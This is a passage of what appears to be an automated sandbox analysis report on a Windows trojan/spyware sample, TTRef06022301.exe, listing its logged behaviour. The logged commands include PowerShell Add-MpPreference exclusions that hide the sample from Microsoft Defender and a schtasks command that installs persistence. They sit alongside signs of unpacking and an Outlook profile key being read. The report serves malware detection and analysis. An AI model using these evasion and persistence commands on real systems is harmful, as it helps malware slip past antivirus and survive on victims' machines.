                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TTRef06022301.exeJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\iJyzakGsXF.exeJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iJyzakGsXF" /XML "C:\Users\user\AppData\Local\Temp\tmp685E.tmpJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess created: C:\Users\user\Desktop\TTRef06022301.exe C:\Users\user\Desktop\TTRef06022301.exeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iJyzakGsXF" /XML "C:\Users\user\AppData\Local\Temp\tmpC6BA.tmpJump to behavior
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess created: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe C:\Users\user\AppData\Roaming\iJyzakGsXF.exeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess created: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe C:\Users\user\AppData\Roaming\iJyzakGsXF.exeJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\Desktop\TTRef06022301.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\TTRef06022301.exeFile created: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeFile created: C:\Users\user\AppData\Local\Temp\tmp685E.tmpJump to behavior
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@20/11@8/4
                  Source: C:\Users\user\Desktop\TTRef06022301.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: TTRef06022301.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                  Source: C:\Users\user\Desktop\TTRef06022301.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4964:120:WilError_01
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2668:120:WilError_01
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4608:120:WilError_01
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5220:120:WilError_01
                  Source: C:\Users\user\Desktop\TTRef06022301.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\TTRef06022301.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: TTRef06022301.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: TTRef06022301.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: TTRef06022301.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: vEfr.pdbSHA256+J${ source: TTRef06022301.exe, iJyzakGsXF.exe.0.dr
                  Source: Binary string: vEfr.pdb source: TTRef06022301.exe, iJyzakGsXF.exe.0.dr

                  Data Obfuscation

                  barindex
                  .NET source code contains potential unpacker
                  Source: TTRef06022301.exe, GraphComposite/Form1.cs.Net Code: InitializeComponent System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 0.0.TTRef06022301.exe.1b0000.0.unpack, GraphComposite/Form1.cs.Net Code: InitializeComponent System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: C:\Users\user\Desktop\TTRef06022301.exeCode function: 0_2_00AB9BF8 push 780274A5h; ret 0_2_00AB9CB5
                  Source: C:\Users\user\Desktop\TTRef06022301.exeCode function: 0_2_00AB9C58 push 780274A5h; ret 0_2_00AB9CB5
                  Source: C:\Users\user\Desktop\TTRef06022301.exeCode function: 0_2_027CA88F push cs; ret 0_2_027CA8C6
                  Source: C:\Users\user\Desktop\TTRef06022301.exeCode function: 0_2_027CDEF8 push cs; ret 0_2_027CDF46
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeCode function: 7_2_008B9CB0 push 7800D3A5h; ret 7_2_008B9CB5
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeCode function: 7_2_008BDF88 pushad ; iretd 7_2_008BDF89
                  Source: initial sampleStatic PE information: section name: .text entropy: 7.977721750892678
                  Source: initial sampleStatic PE information: section name: .text entropy: 7.977721750892678
                  Source: C:\Users\user\Desktop\TTRef06022301.exeFile created: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeJump to dropped file

                  Boot Survival

                  barindex
                  Uses schtasks.exe or at.exe to add and modify task schedules
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iJyzakGsXF" /XML "C:\Users\user\AppData\Local\Temp\tmp685E.tmp
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
